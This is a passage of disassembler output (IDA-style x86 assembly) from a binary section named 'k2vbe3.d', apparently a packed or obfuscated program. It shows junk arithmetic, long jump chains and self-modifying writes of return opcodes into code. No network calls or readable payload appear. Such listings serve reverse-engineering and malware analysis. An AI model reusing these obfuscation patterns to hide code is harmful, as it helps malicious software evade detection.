		xor	eax, ecx
		pop	ecx
		rol	eax, 13h
		jmp	loc_443584
; ---------------------------------------------------------------------------
		mov	ds:off_41E0F8, eax
		lea	eax, sub_453E9F
		mov	byte ptr [eax],	0C3h
		jmp	sub_453E9F
; ---------------------------------------------------------------------------

loc_43E917:				; CODE XREF: k2vbe3.d:loc_45993Dj
		mov	eax, [esp]
		push	edx
		jmp	loc_4541E7
; ---------------------------------------------------------------------------

loc_43E920:				; CODE XREF: k2vbe3.d:004596D8j
		call	sub_44FA7E
		adc	eax, ebx
		sbb	eax, 54D2712Ch
		jmp	sub_45649E

; =============== S U B	R O U T	I N E =======================================



sub_43E932	proc near		; CODE XREF: sub_4424CF:loc_44CFC7p
					; k2vbe3.d:00454C36j
		xchg	edx, [esp+0]
		pop	edx
		add	edi, 0A9C30EFAh
		mov	[edi], eax
		pop	edi
		jmp	nullsub_24
sub_43E932	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		adc	edx, 5FD29Bh
		jmp	loc_448A77
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444DA9

loc_43E94F:				; CODE XREF: sub_444DA9+Cj
		mov	ebp, esp
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+8+var_8]
		mov	esp, ebp
		pop	ebp
		push	offset sub_43FDC1
		jmp	nullsub_35
; END OF FUNCTION CHUNK	FOR sub_444DA9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458019

loc_43E964:				; CODE XREF: sub_458019+15j
		jnz	sub_4488D6
		jmp	loc_44F525
; END OF FUNCTION CHUNK	FOR sub_458019
; ---------------------------------------------------------------------------

loc_43E96F:				; CODE XREF: k2vbe3.d:00448A42j
		adc	edx, esi
		cdq
		jmp	loc_448D0E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_153. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43E978:				; CODE XREF: k2vbe3.d:0044BD65j
		jmp	loc_449F5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44298D

loc_43E97D:				; CODE XREF: sub_44298D+7j
		jmp	sub_44A7C2
; END OF FUNCTION CHUNK	FOR sub_44298D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E90

loc_43E982:				; CODE XREF: sub_444E90-2C1Aj
		jmp	loc_44DFAD
; END OF FUNCTION CHUNK	FOR sub_444E90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_43E987:				; CODE XREF: sub_443A30+16340j
		push	1496679Dh

loc_43E98C:				; CODE XREF: sub_443A30:loc_453602j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44C7FD
		jmp	loc_45BFA9
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_43E99D:				; CODE XREF: sub_4426DF+E374j
		cmp	ebp, edx
		jmp	loc_44AA1A
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
		push	eax
		push	0A5B515BCh
		xchg	ecx, [esp]
		mov	eax, ecx
		pop	ecx
		jmp	loc_451C62
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_539. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2FC

loc_43E9B6:				; CODE XREF: sub_43E2FC+EEEBj
		jmp	loc_457981
; END OF FUNCTION CHUNK	FOR sub_43E2FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448218

loc_43E9BB:				; CODE XREF: sub_448218+17j
		jmp	nullsub_46
; END OF FUNCTION CHUNK	FOR sub_448218
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_43E9C0:				; CODE XREF: k2vbe3.d:0043E8A8j
					; sub_448D7F-7F59j
		jmp	loc_43F196
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_43E9C5:				; CODE XREF: sub_43F7AC+C67Aj
		pop	edx

loc_43E9C6:				; CODE XREF: sub_43F7AC:loc_45956Fj
		push	5247DE0h
		pop	eax
		rol	eax, 0Eh
		jb	loc_44F635

loc_43E9D5:				; CODE XREF: k2vbe3.d:0045B062j
		jmp	loc_454CD4
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------

loc_43E9DA:				; CODE XREF: k2vbe3.d:00459A8Cj
		jmp	locret_452683
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_43E9DF:				; CODE XREF: sub_443EF6+FA91j
		jmp	loc_456DDB
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------
		jb	loc_45032D
		jmp	loc_45BB96
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F04

loc_43E9EF:				; CODE XREF: sub_450F04:loc_4599CFj
		pop	esi
		xor	esi, 340DB85h
		or	esi, 0A33194ECh
		and	esi, 6B1731DDh
		rol	esi, 4
		add	esi, 0CF30D718h
		xchg	esi, [esp+0]
		jmp	sub_44ADEC
; END OF FUNCTION CHUNK	FOR sub_450F04
; ---------------------------------------------------------------------------

loc_43EA13:				; CODE XREF: k2vbe3.d:0045BF87j
		pop	edx
; START	OF FUNCTION CHUNK FOR sub_45AB7E

loc_43EA14:				; CODE XREF: sub_45AB7E:loc_45BF6Bj
		add	eax, 0A79A9E60h
		xchg	eax, [esp-4+arg_0]
		jmp	sub_447BE9
; END OF FUNCTION CHUNK	FOR sub_45AB7E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_459. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_43EA23:				; CODE XREF: sub_45B20A-11AB7j
		mov	ds:off_41E16C, eax
		call	sub_455CFE
; END OF FUNCTION CHUNK	FOR sub_45B20A
; START	OF FUNCTION CHUNK FOR sub_454F9F

loc_43EA2E:				; CODE XREF: sub_454F9F+4j
		jmp	loc_4579D4
; END OF FUNCTION CHUNK	FOR sub_454F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_43EA33:				; CODE XREF: sub_444B3E+2093j
		jmp	nullsub_432
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451759

loc_43EA38:				; CODE XREF: sub_451759-10D5Cj
		jmp	nullsub_360
; END OF FUNCTION CHUNK	FOR sub_451759
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_164. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449661

loc_43EA3E:				; CODE XREF: sub_449661+19j
					; sub_447C43:loc_44B82Aj
		jmp	loc_441EE7
; END OF FUNCTION CHUNK	FOR sub_449661
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_43EA43:				; CODE XREF: sub_442C22+706Bj
		jb	loc_458C9D
		add	ecx, eax
		and	edx, edi
		jmp	loc_448A92
; END OF FUNCTION CHUNK	FOR sub_442C22
; ---------------------------------------------------------------------------
		jns	loc_458632
		jmp	sub_444EFA
; ---------------------------------------------------------------------------

loc_43EA5D:				; DATA XREF: sub_44E503-455Fo
		mov	eax, [esp]
		push	edx
		call	sub_454E83
		push	8AA08821h
		jmp	loc_442A50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA25

loc_43EA70:				; CODE XREF: sub_45AA25:loc_45AA34j
		pop	esi
		sbb	eax, ebx
		sbb	esi, 32D56D9Fh
		jmp	loc_43E23D
; END OF FUNCTION CHUNK	FOR sub_45AA25
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_43EA7E:				; CODE XREF: sub_448D7F:loc_43F01Dj
		or	edx, 11D4F3ABh
		test	edx, 1000000h
		jmp	loc_453830
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_43EA8F:				; CODE XREF: sub_447692+22E2j
					; sub_447692:loc_457769j
		mov	eax, 1D403CB1h
		push	ecx
		push	37CB778Fh
		pop	ecx
		xor	ecx, 0DC2B8176h
		add	ecx, 0EA7A6026h
		rol	ecx, 3
		jmp	loc_44A3D8
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_43EAAF:				; CODE XREF: sub_44B2D7+D316j
		jge	loc_43C580

loc_43EAB5:				; CODE XREF: sub_44B2D7:loc_45413Fj
		push	edx
		push	offset loc_459CC9
		jmp	loc_44BD4D
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------

loc_43EAC0:				; CODE XREF: k2vbe3.d:0045063Dj
		jnp	loc_4439BF

loc_43EAC6:				; CODE XREF: k2vbe3.d:loc_44381Cj
		call	sub_43CF52

loc_43EACB:				; CODE XREF: k2vbe3.d:0044BB0Aj
		jmp	loc_45109B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C579

loc_43EAD0:				; CODE XREF: sub_44C579-B202j
		jmp	sub_447BE9
; END OF FUNCTION CHUNK	FOR sub_44C579
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_43EAD5:				; CODE XREF: sub_456666:loc_44FFF0j
		push	0BA620575h
		pop	eax

loc_43EADB:				; CODE XREF: sub_43C3A9:loc_45732Bj
		add	eax, 2AA4DC3Bh
		or	eax, 5BCC0591h
		sub	eax, 89B7D62Ah
		add	eax, 0BE927C55h
		test	eax, 200h
		jmp	loc_44A6ED
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_43EAFE:				; CODE XREF: sub_4505F8:loc_43FA74j
		xchg	edx, [esp+4+var_4]
		mov	eax, edx
		pop	edx
		or	eax, ds:4000F2h
		sub	eax, 0F5219EBh
		add	eax, 0B5CA7D20h
		mov	eax, [eax]
		jmp	loc_450C53
; END OF FUNCTION CHUNK	FOR sub_4505F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_43EB1D:				; CODE XREF: sub_445124+10D4j
		jle	loc_453900
		jmp	loc_440E9D
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_43EB28:				; CODE XREF: sub_454E83-1E7Aj
		sbb	edi, ebx

loc_43EB2A:				; CODE XREF: sub_45244A:loc_44F33Fj
		call	nullsub_1
; END OF FUNCTION CHUNK	FOR sub_454E83
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_43EB2F:				; CODE XREF: sub_44B912:loc_441921j
					; sub_45A323:loc_45A594j
		jns	loc_45A973
		xor	eax, eax
		mov	[ebp-10h], eax
		jmp	loc_44B57C
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43EB3F:				; CODE XREF: sub_45A323:loc_44BD31j
		sbb	eax, ecx
		jge	loc_43E68F
		mov	ebp, ecx
		xor	ecx, ebp

loc_43EB4B:				; CODE XREF: sub_43DA1E+18EACj
		cmp	ecx, 42A75742h
		jmp	loc_45210F
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_43EB56:				; CODE XREF: k2vbe3.d:004536A6j
		adc	edi, ecx
		xor	esi, 313D34C1h
		mov	eax, 0B7CC66BCh
		sub	ebx, edx
		jmp	loc_44666C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_43EB6A:				; CODE XREF: sub_44B2D7+4803j
					; sub_44B2D7:loc_4571F0j
		add	ecx, 7C3F31E2h
		xchg	ecx, [esp+8+var_8]
		jmp	nullsub_14
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
		shl	ebx, 8
		add	ebp, eax
		jmp	sub_44533A
; ---------------------------------------------------------------------------

loc_43EB82:				; DATA XREF: sub_44471B-AC4o
		pop	edi
		jz	loc_44EFC3
		jmp	loc_450D8C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_43EB8E:				; CODE XREF: sub_43FF59+11799j
		add	eax, 0EB244C04h
		rol	eax, 5
		xor	eax, 0A5F281ECh
		add	eax, 32A41166h
		add	eax, ebp
		add	eax, 50471FECh
		popf
		jmp	loc_4550A5
; END OF FUNCTION CHUNK	FOR sub_43FF59

; =============== S U B	R O U T	I N E =======================================



sub_43EBB1	proc near		; CODE XREF: sub_4583B8p
					; k2vbe3.d:0045B14Bj

; FUNCTION CHUNK AT 004515AE SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		pop	edx
		push	offset loc_444CCC
		jmp	loc_4515AE
sub_43EBB1	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43EBC0	proc near		; DATA XREF: sub_44D298:loc_44E92Do

; FUNCTION CHUNK AT 0044531D SIZE 00000004 BYTES

		mov	[ecx+0B8h], eax
		xchg	eax, [esp+0]
		mov	ecx, eax
		not	eax
		jmp	loc_44531D
sub_43EBC0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_43EBD2:				; CODE XREF: sub_449372:loc_448BA7j
		jns	loc_44B6BF
		jmp	loc_441D49
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_43EBDD:				; CODE XREF: sub_4440E5:loc_45B19Dj
		xchg	ebp, ebx
		sub	edx, edi
		jmp	loc_444871
; END OF FUNCTION CHUNK	FOR sub_4440E5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_236. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449067

loc_43EBE7:				; CODE XREF: sub_449067+10j
		jmp	loc_43C8F1
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4423D2

loc_43EBEC:				; CODE XREF: sub_4423D2:loc_452563j
		mov	edi, ecx
		sub	ebp, ecx
		jmp	loc_44002D
; END OF FUNCTION CHUNK	FOR sub_4423D2
; ---------------------------------------------------------------------------

loc_43EBF5:				; CODE XREF: k2vbe3.d:0043D754j
		cmp	ebp, 3103A04h
		jmp	loc_44D9D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_43EC00:				; CODE XREF: sub_4481FA+9C5Bj
		or	edx, 6F4D5AC9h
		xor	edx, 3D49323Fh
		xor	eax, edx
		call	sub_4445E2
; END OF FUNCTION CHUNK	FOR sub_4481FA
; START	OF FUNCTION CHUNK FOR sub_44F1C4

loc_43EC13:				; CODE XREF: sub_44F1C4+10j
		jmp	loc_45B2C4
; END OF FUNCTION CHUNK	FOR sub_44F1C4
; ---------------------------------------------------------------------------
		shl	ecx, 0Bh
		jmp	loc_45A072
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44881E

loc_43EC20:				; CODE XREF: sub_44881E+11j
		lea	eax, sub_445321
		push	offset loc_459DE2
		jmp	loc_44C511
; END OF FUNCTION CHUNK	FOR sub_44881E
; ---------------------------------------------------------------------------

loc_43EC30:				; CODE XREF: k2vbe3.d:loc_45A029j
		add	eax, 77E53C56h
		push	ecx
		push	9F9DAE05h
		xchg	ebx, [esp]
		mov	ecx, ebx
		pop	ebx
		sub	ecx, 6D6F1912h
		jmp	loc_44E571
; ---------------------------------------------------------------------------

loc_43EC4D:				; DATA XREF: sub_44E18C+1o
		push	0E57BA9AAh
		pop	ecx
		xor	ecx, 3E674220h
		add	ecx, 2527EE78h
		xchg	ecx, [esp]
		jmp	loc_44B049
; ---------------------------------------------------------------------------

loc_43EC67:				; CODE XREF: k2vbe3.d:0043D8B4j
		jnz	loc_44C704

loc_43EC6D:				; CODE XREF: k2vbe3.d:0043DCF9j
		jmp	locret_43F28A
; ---------------------------------------------------------------------------
		jz	loc_44FAD4
		push	59785C2h
		add	ecx, 7ACD44CAh
		jmp	loc_44C6FE
; ---------------------------------------------------------------------------
		sub	eax, 0E3626F66h
		and	ebx, edi
		pushf
		push	52ABA6D4h
		push	ecx
		jmp	loc_43F565
; ---------------------------------------------------------------------------

loc_43EC9C:				; CODE XREF: k2vbe3.d:004492AAj
		or	eax, 5222946Bh
		push	0A801BB99h
		jmp	loc_456B07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_43ECAC:				; CODE XREF: sub_44F028:loc_446E9Cj
		jg	loc_44506F
		jmp	loc_43D88D
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_43ECB7:				; CODE XREF: sub_4505F8-17B3j
		mov	edi, 5E6D200Dh
		jmp	loc_44DEFF
; END OF FUNCTION CHUNK	FOR sub_4505F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_43ECC1:				; CODE XREF: sub_43C3A9:loc_44E727j
		and	edx, 74971CA0h
		sub	edx, 7BEA42A5h
		and	edx, 96AA93F7h
		add	edx, 6BA15EC1h
		mov	[edx], eax
		jmp	loc_45671C
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_68. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43ECE1:				; CODE XREF: sub_44C90E+7A5Ej
		jmp	loc_44FB65
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_43ECE6:				; CODE XREF: k2vbe3.d:loc_446B03j
		jle	loc_447E17
		adc	edx, ebx
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_43ECEE:				; CODE XREF: sub_44DD31:loc_45205Aj
		xor	ecx, 0A4465799h
		and	ecx, 79033428h
		jmp	loc_43F22E
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43ECFF:				; CODE XREF: sub_44C90E+D6C9j
					; DATA XREF: sub_43DA01o
		push	eax
		mov	eax, ebp
		xchg	eax, [esp+0]
		mov	ebp, esp
		add	esp, 0FFFFFEF8h
		jmp	loc_44905A
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4A2

loc_43ED12:				; CODE XREF: sub_45B4A2:loc_45C253j
					; k2vbe3.d:loc_45C38Bj
		jnz	loc_44BA7B
		jmp	loc_446A07
; END OF FUNCTION CHUNK	FOR sub_45B4A2
; ---------------------------------------------------------------------------

loc_43ED1D:				; CODE XREF: k2vbe3.d:004576C8j
		adc	edx, edi

; =============== S U B	R O U T	I N E =======================================



sub_43ED1F	proc near		; CODE XREF: sub_4467A1:loc_452DB3p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D20D SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043F00D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00442846 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447227 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004571DC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045BA0A SIZE 00000005 BYTES

		xchg	ebx, [esp+4+var_4]
		pop	ebx
		jnz	loc_4571DC
		jmp	loc_447227
sub_43ED1F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 2E5256Ah
		jmp	loc_43F58E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447C43

loc_43ED38:				; CODE XREF: sub_447C43-4842j
		mov	dword ptr [ebp+eax*4-70h], 73257325h
		inc	dword ptr [ebp-8]
		call	sub_447C43

loc_43ED48:				; CODE XREF: sub_43E107:loc_453EA9j
		and	edi, 57A14690h
		or	edi, 6F267BF8h
		add	edi, 811E951Fh
		xchg	edi, [esp+0]
		jmp	loc_459884
; END OF FUNCTION CHUNK	FOR sub_447C43
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A99

loc_43ED62:				; CODE XREF: sub_450A99:loc_44DA60j
		call	sub_4467E1
; END OF FUNCTION CHUNK	FOR sub_450A99
; START	OF FUNCTION CHUNK FOR sub_447664

loc_43ED67:				; CODE XREF: sub_447664+10F32j
		jmp	loc_441C5A
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45282D

loc_43ED6C:				; CODE XREF: sub_45282D+622j
		jmp	loc_44B133
; END OF FUNCTION CHUNK	FOR sub_45282D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE2A

loc_43ED71:				; CODE XREF: sub_445373j
					; sub_43FE2A+70F7j
		or	ecx, ecx
		push	offset loc_43D382
		jmp	nullsub_45
; END OF FUNCTION CHUNK	FOR sub_43FE2A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4401FF

loc_43ED7D:				; CODE XREF: sub_4401FF:loc_455814j
		cdq
		jmp	loc_44C286
; END OF FUNCTION CHUNK	FOR sub_4401FF
; ---------------------------------------------------------------------------

loc_43ED83:				; CODE XREF: k2vbe3.d:loc_458171j
		mov	ecx, edi
		pop	edi
		pop	edx
		pop	ebp
		jmp	sub_44B2D7
; ---------------------------------------------------------------------------

loc_43ED8D:				; CODE XREF: k2vbe3.d:loc_4401A9j
		cmp	ecx, 0F889CCD0h
		jmp	loc_44CB4C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_358. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C68E

loc_43ED99:				; CODE XREF: sub_43C68E+1BFE2j
		jmp	loc_451B66
; END OF FUNCTION CHUNK	FOR sub_43C68E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449488

loc_43ED9E:				; CODE XREF: sub_449488-1D69j
		jmp	loc_44772F
; END OF FUNCTION CHUNK	FOR sub_449488
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E080
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_43EDA9:				; CODE XREF: sub_4468FE+110BAj
		jmp	nullsub_252
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A58

loc_43EDAE:				; CODE XREF: sub_457A58-275Ej
		jmp	loc_44BE7B
; END OF FUNCTION CHUNK	FOR sub_457A58
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	offset sub_44C990
		jmp	loc_4426A1
; ---------------------------------------------------------------------------

loc_43EDBE:				; CODE XREF: k2vbe3.d:loc_4513E0j
		mov	eax, 92A798AFh
		call	sub_442745
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_201. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		xor	edi, ebp
		cmp	eax, ecx
		jmp	loc_4463A0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_43EDD2:				; CODE XREF: sub_4582DD:loc_45B539j
		jnz	loc_45B26A
		jmp	loc_4595E8
; END OF FUNCTION CHUNK	FOR sub_4582DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_112. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448FDB

loc_43EDDE:				; CODE XREF: sub_448FDB:loc_45941Dj
		mov	byte ptr [eax],	0C3h
		jmp	sub_44CB04
; END OF FUNCTION CHUNK	FOR sub_448FDB

; =============== S U B	R O U T	I N E =======================================



sub_43EDE6	proc near		; CODE XREF: sub_40D41A:loc_40D553p
					; sub_445124+EFE6j
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00447BD1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C805 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F296 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453F09 SIZE 0000000E BYTES

		push	eax
		mov	eax, esi
		xchg	eax, [esp+4+var_4]
		push	6A768479h
		pop	esi
		and	esi, ds:4000F3h
		add	esi, 0CE848CABh
		jmp	loc_44C805
sub_43EDE6	endp


; =============== S U B	R O U T	I N E =======================================



sub_43EE03	proc near		; CODE XREF: k2vbe3.d:00443672p
					; k2vbe3.d:00457CB3j
		xchg	eax, [esp+0]
sub_43EE03	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44B999

loc_43EE06:				; CODE XREF: sub_44B999:loc_43FBEDj
		pop	eax
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44C9FA
		jmp	loc_45A17B
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_43EE16:				; CODE XREF: sub_44B2D7-3EF1j
		test	al, al
		jz	loc_4444DC
		jmp	loc_45413F
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_43EE23:				; CODE XREF: sub_45A9B3:loc_453161j
		pop	ebx
		jl	loc_455177
		jmp	loc_454A07
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45234F

loc_43EE2F:				; CODE XREF: sub_45234F+Dj
		or	edi, 0B6E29CA8h
		xor	edi, 8CF9E4DCh
		push	offset loc_43D1D5
		jmp	nullsub_125
; END OF FUNCTION CHUNK	FOR sub_45234F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_43EE45:				; CODE XREF: sub_441409+132E6j
		cmp	ebx, 0DC193DBCh
		jmp	loc_44824A
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F22

loc_43EE50:				; CODE XREF: sub_445F22-3B55j
					; sub_445F22:loc_44FA0Dj
		mov	eax, [esp+0]
		push	eax
		call	sub_448D3A
; END OF FUNCTION CHUNK	FOR sub_445F22
; START	OF FUNCTION CHUNK FOR sub_4536DC

loc_43EE59:				; CODE XREF: sub_4536DC+1j
		or	eax, eax
		jnz	loc_44A226
		jmp	loc_456A25
; END OF FUNCTION CHUNK	FOR sub_4536DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_43EE66:				; CODE XREF: sub_44C90E+8888j
		pushf
		test	edi, eax
		jmp	loc_44321A
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B58F

loc_43EE6E:				; CODE XREF: sub_44B58F+Fj
		mov	ds:off_41E118, eax
		lea	eax, loc_454115
		mov	byte ptr [eax],	0C3h
		jmp	loc_44410C
; END OF FUNCTION CHUNK	FOR sub_44B58F

; =============== S U B	R O U T	I N E =======================================



sub_43EE82	proc near		; CODE XREF: .text:0040D0C8p
					; sub_43EE82:loc_458946j
					; DATA XREF: ...

; FUNCTION CHUNK AT 00458946 SIZE 00000006 BYTES

		call	sub_458951
		jmp	loc_458946
sub_43EE82	endp

; ---------------------------------------------------------------------------

loc_43EE8C:				; CODE XREF: k2vbe3.d:00452D68j
		rol	ecx, 2
		xor	ecx, 21F23DAAh
		or	ecx, 6BB81CCCh
		add	ecx, 4883BD8h
		xchg	ecx, [esp]
		jmp	loc_459D9E
; ---------------------------------------------------------------------------
		popf
		jmp	sub_4460FD
; ---------------------------------------------------------------------------
		db 9, 0C0h
; ---------------------------------------------------------------------------
		jmp	loc_455D34
; ---------------------------------------------------------------------------

loc_43EEB6:				; CODE XREF: k2vbe3.d:0044C093j
		mov	edx, ds:dword_43D4E0
		call	sub_43FECA
; START	OF FUNCTION CHUNK FOR sub_43E753

loc_43EEC1:				; CODE XREF: sub_43E753+12CFDj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_43E753

; =============== S U B	R O U T	I N E =======================================



sub_43EEC6	proc near		; CODE XREF: sub_454E69:loc_450EB2j

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043F0E0 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043F704 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00440BCB SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00442D15 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00444CAC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004467F6 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00446EF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447DF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004493C7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A924 SIZE 0000000D BYTES
